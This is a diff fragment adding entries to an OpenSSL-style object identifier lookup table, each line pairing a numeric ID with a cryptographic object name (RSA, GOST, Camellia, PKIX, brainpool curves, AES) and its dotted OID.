+ 1,	/* OBJ_rsadsi                       1 2 840 113549 */
+185,	/* OBJ_X9cm                         1 2 840 10040 4 */
+127,	/* OBJ_id_pkix                      1 3 6 1 5 5 7 */
+505,	/* OBJ_mime_mhs_headings            1 3 6 1 7 1 1 */
+506,	/* OBJ_mime_mhs_bodies              1 3 6 1 7 1 2 */
+119,	/* OBJ_ripemd160WithRSA             1 3 36 3 3 1 2 */
+937,	/* OBJ_dhSinglePass_stdDH_sha224kdf_scheme 1 3 132 1 11 0 */
+938,	/* OBJ_dhSinglePass_stdDH_sha256kdf_scheme 1 3 132 1 11 1 */
+939,	/* OBJ_dhSinglePass_stdDH_sha384kdf_scheme 1 3 132 1 11 2 */
+940,	/* OBJ_dhSinglePass_stdDH_sha512kdf_scheme 1 3 132 1 11 3 */
+942,	/* OBJ_dhSinglePass_cofactorDH_sha224kdf_scheme 1 3 132 1 14 0 */
+943,	/* OBJ_dhSinglePass_cofactorDH_sha256kdf_scheme 1 3 132 1 14 1 */
+944,	/* OBJ_dhSinglePass_cofactorDH_sha384kdf_scheme 1 3 132 1 14 2 */
+945,	/* OBJ_dhSinglePass_cofactorDH_sha512kdf_scheme 1 3 132 1 14 3 */
+631,	/* OBJ_setAttr_GenCryptgrm          2 23 42 3 3 3 1 */
+632,	/* OBJ_setAttr_T2Enc                2 23 42 3 3 4 1 */
+633,	/* OBJ_setAttr_T2cleartxt           2 23 42 3 3 4 2 */
+634,	/* OBJ_setAttr_TokICCsig            2 23 42 3 3 5 1 */
+635,	/* OBJ_setAttr_SecDevSig            2 23 42 3 3 5 2 */
+436,	/* OBJ_ucl                          0 9 2342 19200300 */
+820,	/* OBJ_id_Gost28147_89_None_KeyMeshing 1 2 643 2 2 14 0 */
+819,	/* OBJ_id_Gost28147_89_CryptoPro_KeyMeshing 1 2 643 2 2 14 1 */
+845,	/* OBJ_id_GostR3410_94_a            1 2 643 2 2 20 1 */
+846,	/* OBJ_id_GostR3410_94_aBis         1 2 643 2 2 20 2 */
+847,	/* OBJ_id_GostR3410_94_b            1 2 643 2 2 20 3 */
+848,	/* OBJ_id_GostR3410_94_bBis         1 2 643 2 2 20 4 */
+821,	/* OBJ_id_GostR3411_94_TestParamSet 1 2 643 2 2 30 0 */
+822,	/* OBJ_id_GostR3411_94_CryptoProParamSet 1 2 643 2 2 30 1 */
+823,	/* OBJ_id_Gost28147_89_TestParamSet 1 2 643 2 2 31 0 */
+824,	/* OBJ_id_Gost28147_89_CryptoPro_A_ParamSet 1 2 643 2 2 31 1 */
+825,	/* OBJ_id_Gost28147_89_CryptoPro_B_ParamSet 1 2 643 2 2 31 2 */
+826,	/* OBJ_id_Gost28147_89_CryptoPro_C_ParamSet 1 2 643 2 2 31 3 */
+827,	/* OBJ_id_Gost28147_89_CryptoPro_D_ParamSet 1 2 643 2 2 31 4 */
+828,	/* OBJ_id_Gost28147_89_CryptoPro_Oscar_1_1_ParamSet 1 2 643 2 2 31 5 */
+829,	/* OBJ_id_Gost28147_89_CryptoPro_Oscar_1_0_ParamSet 1 2 643 2 2 31 6 */
+830,	/* OBJ_id_Gost28147_89_CryptoPro_RIC_1_ParamSet 1 2 643 2 2 31 7 */
+831,	/* OBJ_id_GostR3410_94_TestParamSet 1 2 643 2 2 32 0 */
+832,	/* OBJ_id_GostR3410_94_CryptoPro_A_ParamSet 1 2 643 2 2 32 2 */
+833,	/* OBJ_id_GostR3410_94_CryptoPro_B_ParamSet 1 2 643 2 2 32 3 */
+834,	/* OBJ_id_GostR3410_94_CryptoPro_C_ParamSet 1 2 643 2 2 32 4 */
+835,	/* OBJ_id_GostR3410_94_CryptoPro_D_ParamSet 1 2 643 2 2 32 5 */
+836,	/* OBJ_id_GostR3410_94_CryptoPro_XchA_ParamSet 1 2 643 2 2 33 1 */
+837,	/* OBJ_id_GostR3410_94_CryptoPro_XchB_ParamSet 1 2 643 2 2 33 2 */
+838,	/* OBJ_id_GostR3410_94_CryptoPro_XchC_ParamSet 1 2 643 2 2 33 3 */
+839,	/* OBJ_id_GostR3410_2001_TestParamSet 1 2 643 2 2 35 0 */
+840,	/* OBJ_id_GostR3410_2001_CryptoPro_A_ParamSet 1 2 643 2 2 35 1 */
+841,	/* OBJ_id_GostR3410_2001_CryptoPro_B_ParamSet 1 2 643 2 2 35 2 */
+842,	/* OBJ_id_GostR3410_2001_CryptoPro_C_ParamSet 1 2 643 2 2 35 3 */
+843,	/* OBJ_id_GostR3410_2001_CryptoPro_XchA_ParamSet 1 2 643 2 2 36 0 */
+844,	/* OBJ_id_GostR3410_2001_CryptoPro_XchB_ParamSet 1 2 643 2 2 36 1 */
+ 2,	/* OBJ_pkcs                         1 2 840 113549 1 */
+431,	/* OBJ_hold_instruction_none        1 2 840 10040 2 1 */
+432,	/* OBJ_hold_instruction_call_issuer 1 2 840 10040 2 2 */
+433,	/* OBJ_hold_instruction_reject      1 2 840 10040 2 3 */
+116,	/* OBJ_dsa                          1 2 840 10040 4 1 */
+113,	/* OBJ_dsaWithSHA1                  1 2 840 10040 4 3 */
+406,	/* OBJ_X9_62_prime_field            1 2 840 10045 1 1 */
+407,	/* OBJ_X9_62_characteristic_two_field 1 2 840 10045 1 2 */
+408,	/* OBJ_X9_62_id_ecPublicKey         1 2 840 10045 2 1 */
+416,	/* OBJ_ecdsa_with_SHA1              1 2 840 10045 4 1 */
+791,	/* OBJ_ecdsa_with_Recommended       1 2 840 10045 4 2 */
+792,	/* OBJ_ecdsa_with_Specified         1 2 840 10045 4 3 */
+920,	/* OBJ_dhpublicnumber               1 2 840 10046 2 1 */
+258,	/* OBJ_id_pkix_mod                  1 3 6 1 5 5 7 0 */
+175,	/* OBJ_id_pe                        1 3 6 1 5 5 7 1 */
+259,	/* OBJ_id_qt                        1 3 6 1 5 5 7 2 */
+128,	/* OBJ_id_kp                        1 3 6 1 5 5 7 3 */
+260,	/* OBJ_id_it                        1 3 6 1 5 5 7 4 */
+261,	/* OBJ_id_pkip                      1 3 6 1 5 5 7 5 */
+262,	/* OBJ_id_alg                       1 3 6 1 5 5 7 6 */
+263,	/* OBJ_id_cmc                       1 3 6 1 5 5 7 7 */
+264,	/* OBJ_id_on                        1 3 6 1 5 5 7 8 */
+265,	/* OBJ_id_pda                       1 3 6 1 5 5 7 9 */
+266,	/* OBJ_id_aca                       1 3 6 1 5 5 7 10 */
+267,	/* OBJ_id_qcs                       1 3 6 1 5 5 7 11 */
+268,	/* OBJ_id_cct                       1 3 6 1 5 5 7 12 */
+662,	/* OBJ_id_ppl                       1 3 6 1 5 5 7 21 */
+176,	/* OBJ_id_ad                        1 3 6 1 5 5 7 48 */
+507,	/* OBJ_id_hex_partial_message       1 3 6 1 7 1 1 1 */
+508,	/* OBJ_id_hex_multipart_message     1 3 6 1 7 1 1 2 */
+57,	/* OBJ_netscape                     2 16 840 1 113730 */
+754,	/* OBJ_camellia_128_ecb             0 3 4401 5 3 1 9 1 */
+766,	/* OBJ_camellia_128_ofb128          0 3 4401 5 3 1 9 3 */
+757,	/* OBJ_camellia_128_cfb128          0 3 4401 5 3 1 9 4 */
+755,	/* OBJ_camellia_192_ecb             0 3 4401 5 3 1 9 21 */
+767,	/* OBJ_camellia_192_ofb128          0 3 4401 5 3 1 9 23 */
+758,	/* OBJ_camellia_192_cfb128          0 3 4401 5 3 1 9 24 */
+756,	/* OBJ_camellia_256_ecb             0 3 4401 5 3 1 9 41 */
+768,	/* OBJ_camellia_256_ofb128          0 3 4401 5 3 1 9 43 */
+759,	/* OBJ_camellia_256_cfb128          0 3 4401 5 3 1 9 44 */
+437,	/* OBJ_pilot                        0 9 2342 19200300 100 */
+776,	/* OBJ_seed_ecb                     1 2 410 200004 1 3 */
+777,	/* OBJ_seed_cbc                     1 2 410 200004 1 4 */
+779,	/* OBJ_seed_cfb128                  1 2 410 200004 1 5 */
+778,	/* OBJ_seed_ofb128                  1 2 410 200004 1 6 */
+852,	/* OBJ_id_GostR3411_94_with_GostR3410_94_cc 1 2 643 2 9 1 3 3 */
+853,	/* OBJ_id_GostR3411_94_with_GostR3410_2001_cc 1 2 643 2 9 1 3 4 */
+850,	/* OBJ_id_GostR3410_94_cc           1 2 643 2 9 1 5 3 */
+851,	/* OBJ_id_GostR3410_2001_cc         1 2 643 2 9 1 5 4 */
+849,	/* OBJ_id_Gost28147_89_cc           1 2 643 2 9 1 6 1 */
+854,	/* OBJ_id_GostR3410_2001_ParamSet_cc 1 2 643 2 9 1 8 1 */
+186,	/* OBJ_pkcs1                        1 2 840 113549 1 1 */
+27,	/* OBJ_pkcs3                        1 2 840 113549 1 3 */
+187,	/* OBJ_pkcs5                        1 2 840 113549 1 5 */
+20,	/* OBJ_pkcs7                        1 2 840 113549 1 7 */
+47,	/* OBJ_pkcs9                        1 2 840 113549 1 9 */
+ 3,	/* OBJ_md2                          1 2 840 113549 2 2 */
+257,	/* OBJ_md4                          1 2 840 113549 2 4 */
+ 4,	/* OBJ_md5                          1 2 840 113549 2 5 */
+797,	/* OBJ_hmacWithMD5                  1 2 840 113549 2 6 */
+163,	/* OBJ_hmacWithSHA1                 1 2 840 113549 2 7 */
+798,	/* OBJ_hmacWithSHA224               1 2 840 113549 2 8 */
+799,	/* OBJ_hmacWithSHA256               1 2 840 113549 2 9 */
+800,	/* OBJ_hmacWithSHA384               1 2 840 113549 2 10 */
+801,	/* OBJ_hmacWithSHA512               1 2 840 113549 2 11 */
+37,	/* OBJ_rc2_cbc                      1 2 840 113549 3 2 */
+ 5,	/* OBJ_rc4                          1 2 840 113549 3 4 */
+44,	/* OBJ_des_ede3_cbc                 1 2 840 113549 3 7 */
+120,	/* OBJ_rc5_cbc                      1 2 840 113549 3 8 */
+643,	/* OBJ_des_cdmf                     1 2 840 113549 3 10 */
+680,	/* OBJ_X9_62_id_characteristic_two_basis 1 2 840 10045 1 2 3 */
+684,	/* OBJ_X9_62_c2pnb163v1             1 2 840 10045 3 0 1 */
+685,	/* OBJ_X9_62_c2pnb163v2             1 2 840 10045 3 0 2 */
+686,	/* OBJ_X9_62_c2pnb163v3             1 2 840 10045 3 0 3 */
+687,	/* OBJ_X9_62_c2pnb176v1             1 2 840 10045 3 0 4 */
+688,	/* OBJ_X9_62_c2tnb191v1             1 2 840 10045 3 0 5 */
+689,	/* OBJ_X9_62_c2tnb191v2             1 2 840 10045 3 0 6 */
+690,	/* OBJ_X9_62_c2tnb191v3             1 2 840 10045 3 0 7 */
+691,	/* OBJ_X9_62_c2onb191v4             1 2 840 10045 3 0 8 */
+692,	/* OBJ_X9_62_c2onb191v5             1 2 840 10045 3 0 9 */
+693,	/* OBJ_X9_62_c2pnb208w1             1 2 840 10045 3 0 10 */
+694,	/* OBJ_X9_62_c2tnb239v1             1 2 840 10045 3 0 11 */
+695,	/* OBJ_X9_62_c2tnb239v2             1 2 840 10045 3 0 12 */
+696,	/* OBJ_X9_62_c2tnb239v3             1 2 840 10045 3 0 13 */
+697,	/* OBJ_X9_62_c2onb239v4             1 2 840 10045 3 0 14 */
+698,	/* OBJ_X9_62_c2onb239v5             1 2 840 10045 3 0 15 */
+699,	/* OBJ_X9_62_c2pnb272w1             1 2 840 10045 3 0 16 */
+700,	/* OBJ_X9_62_c2pnb304w1             1 2 840 10045 3 0 17 */
+701,	/* OBJ_X9_62_c2tnb359v1             1 2 840 10045 3 0 18 */
+702,	/* OBJ_X9_62_c2pnb368w1             1 2 840 10045 3 0 19 */
+703,	/* OBJ_X9_62_c2tnb431r1             1 2 840 10045 3 0 20 */
+409,	/* OBJ_X9_62_prime192v1             1 2 840 10045 3 1 1 */
+410,	/* OBJ_X9_62_prime192v2             1 2 840 10045 3 1 2 */
+411,	/* OBJ_X9_62_prime192v3             1 2 840 10045 3 1 3 */
+412,	/* OBJ_X9_62_prime239v1             1 2 840 10045 3 1 4 */
+413,	/* OBJ_X9_62_prime239v2             1 2 840 10045 3 1 5 */
+414,	/* OBJ_X9_62_prime239v3             1 2 840 10045 3 1 6 */
+415,	/* OBJ_X9_62_prime256v1             1 2 840 10045 3 1 7 */
+793,	/* OBJ_ecdsa_with_SHA224            1 2 840 10045 4 3 1 */
+794,	/* OBJ_ecdsa_with_SHA256            1 2 840 10045 4 3 2 */
+795,	/* OBJ_ecdsa_with_SHA384            1 2 840 10045 4 3 3 */
+796,	/* OBJ_ecdsa_with_SHA512            1 2 840 10045 4 3 4 */
+269,	/* OBJ_id_pkix1_explicit_88         1 3 6 1 5 5 7 0 1 */
+270,	/* OBJ_id_pkix1_implicit_88         1 3 6 1 5 5 7 0 2 */
+271,	/* OBJ_id_pkix1_explicit_93         1 3 6 1 5 5 7 0 3 */
+272,	/* OBJ_id_pkix1_implicit_93         1 3 6 1 5 5 7 0 4 */
+273,	/* OBJ_id_mod_crmf                  1 3 6 1 5 5 7 0 5 */
+274,	/* OBJ_id_mod_cmc                   1 3 6 1 5 5 7 0 6 */
+275,	/* OBJ_id_mod_kea_profile_88        1 3 6 1 5 5 7 0 7 */
+276,	/* OBJ_id_mod_kea_profile_93        1 3 6 1 5 5 7 0 8 */
+277,	/* OBJ_id_mod_cmp                   1 3 6 1 5 5 7 0 9 */
+278,	/* OBJ_id_mod_qualified_cert_88     1 3 6 1 5 5 7 0 10 */
+279,	/* OBJ_id_mod_qualified_cert_93     1 3 6 1 5 5 7 0 11 */
+280,	/* OBJ_id_mod_attribute_cert        1 3 6 1 5 5 7 0 12 */
+281,	/* OBJ_id_mod_timestamp_protocol    1 3 6 1 5 5 7 0 13 */
+282,	/* OBJ_id_mod_ocsp                  1 3 6 1 5 5 7 0 14 */
+283,	/* OBJ_id_mod_dvcs                  1 3 6 1 5 5 7 0 15 */
+284,	/* OBJ_id_mod_cmp2000               1 3 6 1 5 5 7 0 16 */
+177,	/* OBJ_info_access                  1 3 6 1 5 5 7 1 1 */
+285,	/* OBJ_biometricInfo                1 3 6 1 5 5 7 1 2 */
+286,	/* OBJ_qcStatements                 1 3 6 1 5 5 7 1 3 */
+287,	/* OBJ_ac_auditEntity               1 3 6 1 5 5 7 1 4 */
+288,	/* OBJ_ac_targeting                 1 3 6 1 5 5 7 1 5 */
+289,	/* OBJ_aaControls                   1 3 6 1 5 5 7 1 6 */
+290,	/* OBJ_sbgp_ipAddrBlock             1 3 6 1 5 5 7 1 7 */
+291,	/* OBJ_sbgp_autonomousSysNum        1 3 6 1 5 5 7 1 8 */
+292,	/* OBJ_sbgp_routerIdentifier        1 3 6 1 5 5 7 1 9 */
+397,	/* OBJ_ac_proxying                  1 3 6 1 5 5 7 1 10 */
+398,	/* OBJ_sinfo_access                 1 3 6 1 5 5 7 1 11 */
+663,	/* OBJ_proxyCertInfo                1 3 6 1 5 5 7 1 14 */
+164,	/* OBJ_id_qt_cps                    1 3 6 1 5 5 7 2 1 */
+165,	/* OBJ_id_qt_unotice                1 3 6 1 5 5 7 2 2 */
+293,	/* OBJ_textNotice                   1 3 6 1 5 5 7 2 3 */
+129,	/* OBJ_server_auth                  1 3 6 1 5 5 7 3 1 */
+130,	/* OBJ_client_auth                  1 3 6 1 5 5 7 3 2 */
+131,	/* OBJ_code_sign                    1 3 6 1 5 5 7 3 3 */
+132,	/* OBJ_email_protect                1 3 6 1 5 5 7 3 4 */
+294,	/* OBJ_ipsecEndSystem               1 3 6 1 5 5 7 3 5 */
+295,	/* OBJ_ipsecTunnel                  1 3 6 1 5 5 7 3 6 */
+296,	/* OBJ_ipsecUser                    1 3 6 1 5 5 7 3 7 */
+133,	/* OBJ_time_stamp                   1 3 6 1 5 5 7 3 8 */
+180,	/* OBJ_OCSP_sign                    1 3 6 1 5 5 7 3 9 */
+297,	/* OBJ_dvcs                         1 3 6 1 5 5 7 3 10 */
+298,	/* OBJ_id_it_caProtEncCert          1 3 6 1 5 5 7 4 1 */
+299,	/* OBJ_id_it_signKeyPairTypes       1 3 6 1 5 5 7 4 2 */
+300,	/* OBJ_id_it_encKeyPairTypes        1 3 6 1 5 5 7 4 3 */
+301,	/* OBJ_id_it_preferredSymmAlg       1 3 6 1 5 5 7 4 4 */
+302,	/* OBJ_id_it_caKeyUpdateInfo        1 3 6 1 5 5 7 4 5 */
+303,	/* OBJ_id_it_currentCRL             1 3 6 1 5 5 7 4 6 */
+304,	/* OBJ_id_it_unsupportedOIDs        1 3 6 1 5 5 7 4 7 */
+305,	/* OBJ_id_it_subscriptionRequest    1 3 6 1 5 5 7 4 8 */
+306,	/* OBJ_id_it_subscriptionResponse   1 3 6 1 5 5 7 4 9 */
+307,	/* OBJ_id_it_keyPairParamReq        1 3 6 1 5 5 7 4 10 */
+308,	/* OBJ_id_it_keyPairParamRep        1 3 6 1 5 5 7 4 11 */
+309,	/* OBJ_id_it_revPassphrase          1 3 6 1 5 5 7 4 12 */
+310,	/* OBJ_id_it_implicitConfirm        1 3 6 1 5 5 7 4 13 */
+311,	/* OBJ_id_it_confirmWaitTime        1 3 6 1 5 5 7 4 14 */
+312,	/* OBJ_id_it_origPKIMessage         1 3 6 1 5 5 7 4 15 */
+784,	/* OBJ_id_it_suppLangTags           1 3 6 1 5 5 7 4 16 */
+313,	/* OBJ_id_regCtrl                   1 3 6 1 5 5 7 5 1 */
+314,	/* OBJ_id_regInfo                   1 3 6 1 5 5 7 5 2 */
+323,	/* OBJ_id_alg_des40                 1 3 6 1 5 5 7 6 1 */
+324,	/* OBJ_id_alg_noSignature           1 3 6 1 5 5 7 6 2 */
+325,	/* OBJ_id_alg_dh_sig_hmac_sha1      1 3 6 1 5 5 7 6 3 */
+326,	/* OBJ_id_alg_dh_pop                1 3 6 1 5 5 7 6 4 */
+327,	/* OBJ_id_cmc_statusInfo            1 3 6 1 5 5 7 7 1 */
+328,	/* OBJ_id_cmc_identification        1 3 6 1 5 5 7 7 2 */
+329,	/* OBJ_id_cmc_identityProof         1 3 6 1 5 5 7 7 3 */
+330,	/* OBJ_id_cmc_dataReturn            1 3 6 1 5 5 7 7 4 */
+331,	/* OBJ_id_cmc_transactionId         1 3 6 1 5 5 7 7 5 */
+332,	/* OBJ_id_cmc_senderNonce           1 3 6 1 5 5 7 7 6 */
+333,	/* OBJ_id_cmc_recipientNonce        1 3 6 1 5 5 7 7 7 */
+334,	/* OBJ_id_cmc_addExtensions         1 3 6 1 5 5 7 7 8 */
+335,	/* OBJ_id_cmc_encryptedPOP          1 3 6 1 5 5 7 7 9 */
+336,	/* OBJ_id_cmc_decryptedPOP          1 3 6 1 5 5 7 7 10 */
+337,	/* OBJ_id_cmc_lraPOPWitness         1 3 6 1 5 5 7 7 11 */
+338,	/* OBJ_id_cmc_getCert               1 3 6 1 5 5 7 7 15 */
+339,	/* OBJ_id_cmc_getCRL                1 3 6 1 5 5 7 7 16 */
+340,	/* OBJ_id_cmc_revokeRequest         1 3 6 1 5 5 7 7 17 */
+341,	/* OBJ_id_cmc_regInfo               1 3 6 1 5 5 7 7 18 */
+342,	/* OBJ_id_cmc_responseInfo          1 3 6 1 5 5 7 7 19 */
+343,	/* OBJ_id_cmc_queryPending          1 3 6 1 5 5 7 7 21 */
+344,	/* OBJ_id_cmc_popLinkRandom         1 3 6 1 5 5 7 7 22 */
+345,	/* OBJ_id_cmc_popLinkWitness        1 3 6 1 5 5 7 7 23 */
+346,	/* OBJ_id_cmc_confirmCertAcceptance 1 3 6 1 5 5 7 7 24 */
+347,	/* OBJ_id_on_personalData           1 3 6 1 5 5 7 8 1 */
+858,	/* OBJ_id_on_permanentIdentifier    1 3 6 1 5 5 7 8 3 */
+348,	/* OBJ_id_pda_dateOfBirth           1 3 6 1 5 5 7 9 1 */
+349,	/* OBJ_id_pda_placeOfBirth          1 3 6 1 5 5 7 9 2 */
+351,	/* OBJ_id_pda_gender                1 3 6 1 5 5 7 9 3 */
+352,	/* OBJ_id_pda_countryOfCitizenship  1 3 6 1 5 5 7 9 4 */
+353,	/* OBJ_id_pda_countryOfResidence    1 3 6 1 5 5 7 9 5 */
+354,	/* OBJ_id_aca_authenticationInfo    1 3 6 1 5 5 7 10 1 */
+355,	/* OBJ_id_aca_accessIdentity        1 3 6 1 5 5 7 10 2 */
+356,	/* OBJ_id_aca_chargingIdentity      1 3 6 1 5 5 7 10 3 */
+357,	/* OBJ_id_aca_group                 1 3 6 1 5 5 7 10 4 */
+358,	/* OBJ_id_aca_role                  1 3 6 1 5 5 7 10 5 */
+399,	/* OBJ_id_aca_encAttrs              1 3 6 1 5 5 7 10 6 */
+359,	/* OBJ_id_qcs_pkixQCSyntax_v1       1 3 6 1 5 5 7 11 1 */
+360,	/* OBJ_id_cct_crs                   1 3 6 1 5 5 7 12 1 */
+361,	/* OBJ_id_cct_PKIData               1 3 6 1 5 5 7 12 2 */
+362,	/* OBJ_id_cct_PKIResponse           1 3 6 1 5 5 7 12 3 */
+664,	/* OBJ_id_ppl_anyLanguage           1 3 6 1 5 5 7 21 0 */
+665,	/* OBJ_id_ppl_inheritAll            1 3 6 1 5 5 7 21 1 */
+667,	/* OBJ_Independent                  1 3 6 1 5 5 7 21 2 */
+178,	/* OBJ_ad_OCSP                      1 3 6 1 5 5 7 48 1 */
+179,	/* OBJ_ad_ca_issuers                1 3 6 1 5 5 7 48 2 */
+363,	/* OBJ_ad_timeStamping              1 3 6 1 5 5 7 48 3 */
+364,	/* OBJ_ad_dvcs                      1 3 6 1 5 5 7 48 4 */
+785,	/* OBJ_caRepository                 1 3 6 1 5 5 7 48 5 */
+780,	/* OBJ_hmac_md5                     1 3 6 1 5 5 8 1 1 */
+781,	/* OBJ_hmac_sha1                    1 3 6 1 5 5 8 1 2 */
+58,	/* OBJ_netscape_cert_extension      2 16 840 1 113730 1 */
+59,	/* OBJ_netscape_data_type           2 16 840 1 113730 2 */
+438,	/* OBJ_pilotAttributeType           0 9 2342 19200300 100 1 */
+439,	/* OBJ_pilotAttributeSyntax         0 9 2342 19200300 100 3 */
+440,	/* OBJ_pilotObjectClass             0 9 2342 19200300 100 4 */
+441,	/* OBJ_pilotGroups                  0 9 2342 19200300 100 10 */
+108,	/* OBJ_cast5_cbc                    1 2 840 113533 7 66 10 */
+112,	/* OBJ_pbeWithMD5AndCast5_CBC       1 2 840 113533 7 66 12 */
+782,	/* OBJ_id_PasswordBasedMAC          1 2 840 113533 7 66 13 */
+783,	/* OBJ_id_DHBasedMac                1 2 840 113533 7 66 30 */
+ 6,	/* OBJ_rsaEncryption                1 2 840 113549 1 1 1 */
+ 7,	/* OBJ_md2WithRSAEncryption         1 2 840 113549 1 1 2 */
+396,	/* OBJ_md4WithRSAEncryption         1 2 840 113549 1 1 3 */
+ 8,	/* OBJ_md5WithRSAEncryption         1 2 840 113549 1 1 4 */
+65,	/* OBJ_sha1WithRSAEncryption        1 2 840 113549 1 1 5 */
+644,	/* OBJ_rsaOAEPEncryptionSET         1 2 840 113549 1 1 6 */
+919,	/* OBJ_rsaesOaep                    1 2 840 113549 1 1 7 */
+911,	/* OBJ_mgf1                         1 2 840 113549 1 1 8 */
+935,	/* OBJ_pSpecified                   1 2 840 113549 1 1 9 */
+912,	/* OBJ_rsassaPss                    1 2 840 113549 1 1 10 */
+668,	/* OBJ_sha256WithRSAEncryption      1 2 840 113549 1 1 11 */
+669,	/* OBJ_sha384WithRSAEncryption      1 2 840 113549 1 1 12 */
+670,	/* OBJ_sha512WithRSAEncryption      1 2 840 113549 1 1 13 */
+671,	/* OBJ_sha224WithRSAEncryption      1 2 840 113549 1 1 14 */
+28,	/* OBJ_dhKeyAgreement               1 2 840 113549 1 3 1 */
+ 9,	/* OBJ_pbeWithMD2AndDES_CBC         1 2 840 113549 1 5 1 */
+10,	/* OBJ_pbeWithMD5AndDES_CBC         1 2 840 113549 1 5 3 */
+168,	/* OBJ_pbeWithMD2AndRC2_CBC         1 2 840 113549 1 5 4 */
+169,	/* OBJ_pbeWithMD5AndRC2_CBC         1 2 840 113549 1 5 6 */
+170,	/* OBJ_pbeWithSHA1AndDES_CBC        1 2 840 113549 1 5 10 */
+68,	/* OBJ_pbeWithSHA1AndRC2_CBC        1 2 840 113549 1 5 11 */
+69,	/* OBJ_id_pbkdf2                    1 2 840 113549 1 5 12 */
+161,	/* OBJ_pbes2                        1 2 840 113549 1 5 13 */
+162,	/* OBJ_pbmac1                       1 2 840 113549 1 5 14 */
+21,	/* OBJ_pkcs7_data                   1 2 840 113549 1 7 1 */
+22,	/* OBJ_pkcs7_signed                 1 2 840 113549 1 7 2 */
+23,	/* OBJ_pkcs7_enveloped              1 2 840 113549 1 7 3 */
+24,	/* OBJ_pkcs7_signedAndEnveloped     1 2 840 113549 1 7 4 */
+25,	/* OBJ_pkcs7_digest                 1 2 840 113549 1 7 5 */
+26,	/* OBJ_pkcs7_encrypted              1 2 840 113549 1 7 6 */
+48,	/* OBJ_pkcs9_emailAddress           1 2 840 113549 1 9 1 */
+49,	/* OBJ_pkcs9_unstructuredName       1 2 840 113549 1 9 2 */
+50,	/* OBJ_pkcs9_contentType            1 2 840 113549 1 9 3 */
+51,	/* OBJ_pkcs9_messageDigest          1 2 840 113549 1 9 4 */
+52,	/* OBJ_pkcs9_signingTime            1 2 840 113549 1 9 5 */
+53,	/* OBJ_pkcs9_countersignature       1 2 840 113549 1 9 6 */
+54,	/* OBJ_pkcs9_challengePassword      1 2 840 113549 1 9 7 */
+55,	/* OBJ_pkcs9_unstructuredAddress    1 2 840 113549 1 9 8 */
+56,	/* OBJ_pkcs9_extCertAttributes      1 2 840 113549 1 9 9 */
+172,	/* OBJ_ext_req                      1 2 840 113549 1 9 14 */
+167,	/* OBJ_SMIMECapabilities            1 2 840 113549 1 9 15 */
+188,	/* OBJ_SMIME                        1 2 840 113549 1 9 16 */
+156,	/* OBJ_friendlyName                 1 2 840 113549 1 9 20 */
+157,	/* OBJ_localKeyID                   1 2 840 113549 1 9 21 */
+681,	/* OBJ_X9_62_onBasis                1 2 840 10045 1 2 3 1 */
+682,	/* OBJ_X9_62_tpBasis                1 2 840 10045 1 2 3 2 */
+683,	/* OBJ_X9_62_ppBasis                1 2 840 10045 1 2 3 3 */
+417,	/* OBJ_ms_csp_name                  1 3 6 1 4 1 311 17 1 */
+856,	/* OBJ_LocalKeySet                  1 3 6 1 4 1 311 17 2 */
+390,	/* OBJ_dcObject                     1 3 6 1 4 1 1466 344 */
+91,	/* OBJ_bf_cbc                       1 3 6 1 4 1 3029 1 2 */
+315,	/* OBJ_id_regCtrl_regToken          1 3 6 1 5 5 7 5 1 1 */
+316,	/* OBJ_id_regCtrl_authenticator     1 3 6 1 5 5 7 5 1 2 */
+317,	/* OBJ_id_regCtrl_pkiPublicationInfo 1 3 6 1 5 5 7 5 1 3 */
+318,	/* OBJ_id_regCtrl_pkiArchiveOptions 1 3 6 1 5 5 7 5 1 4 */
+319,	/* OBJ_id_regCtrl_oldCertID         1 3 6 1 5 5 7 5 1 5 */
+320,	/* OBJ_id_regCtrl_protocolEncrKey   1 3 6 1 5 5 7 5 1 6 */
+321,	/* OBJ_id_regInfo_utf8Pairs         1 3 6 1 5 5 7 5 2 1 */
+322,	/* OBJ_id_regInfo_certReq           1 3 6 1 5 5 7 5 2 2 */
+365,	/* OBJ_id_pkix_OCSP_basic           1 3 6 1 5 5 7 48 1 1 */
+366,	/* OBJ_id_pkix_OCSP_Nonce           1 3 6 1 5 5 7 48 1 2 */
+367,	/* OBJ_id_pkix_OCSP_CrlID           1 3 6 1 5 5 7 48 1 3 */
+368,	/* OBJ_id_pkix_OCSP_acceptableResponses 1 3 6 1 5 5 7 48 1 4 */
+369,	/* OBJ_id_pkix_OCSP_noCheck         1 3 6 1 5 5 7 48 1 5 */
+370,	/* OBJ_id_pkix_OCSP_archiveCutoff   1 3 6 1 5 5 7 48 1 6 */
+371,	/* OBJ_id_pkix_OCSP_serviceLocator  1 3 6 1 5 5 7 48 1 7 */
+372,	/* OBJ_id_pkix_OCSP_extendedStatus  1 3 6 1 5 5 7 48 1 8 */
+373,	/* OBJ_id_pkix_OCSP_valid           1 3 6 1 5 5 7 48 1 9 */
+374,	/* OBJ_id_pkix_OCSP_path            1 3 6 1 5 5 7 48 1 10 */
+375,	/* OBJ_id_pkix_OCSP_trustRoot       1 3 6 1 5 5 7 48 1 11 */
+921,	/* OBJ_brainpoolP160r1              1 3 36 3 3 2 8 1 1 1 */
+922,	/* OBJ_brainpoolP160t1              1 3 36 3 3 2 8 1 1 2 */
+923,	/* OBJ_brainpoolP192r1              1 3 36 3 3 2 8 1 1 3 */
+924,	/* OBJ_brainpoolP192t1              1 3 36 3 3 2 8 1 1 4 */
+925,	/* OBJ_brainpoolP224r1              1 3 36 3 3 2 8 1 1 5 */
+926,	/* OBJ_brainpoolP224t1              1 3 36 3 3 2 8 1 1 6 */
+927,	/* OBJ_brainpoolP256r1              1 3 36 3 3 2 8 1 1 7 */
+928,	/* OBJ_brainpoolP256t1              1 3 36 3 3 2 8 1 1 8 */
+929,	/* OBJ_brainpoolP320r1              1 3 36 3 3 2 8 1 1 9 */
+930,	/* OBJ_brainpoolP320t1              1 3 36 3 3 2 8 1 1 10 */
+931,	/* OBJ_brainpoolP384r1              1 3 36 3 3 2 8 1 1 11 */
+932,	/* OBJ_brainpoolP384t1              1 3 36 3 3 2 8 1 1 12 */
+933,	/* OBJ_brainpoolP512r1              1 3 36 3 3 2 8 1 1 13 */
+934,	/* OBJ_brainpoolP512t1              1 3 36 3 3 2 8 1 1 14 */
+936,	/* OBJ_dhSinglePass_stdDH_sha1kdf_scheme 1 3 133 16 840 63 0 2 */
+941,	/* OBJ_dhSinglePass_cofactorDH_sha1kdf_scheme 1 3 133 16 840 63 0 3 */
+418,	/* OBJ_aes_128_ecb                  2 16 840 1 101 3 4 1 1 */
+419,	/* OBJ_aes_128_cbc                  2 16 840 1 101 3 4 1 2 */
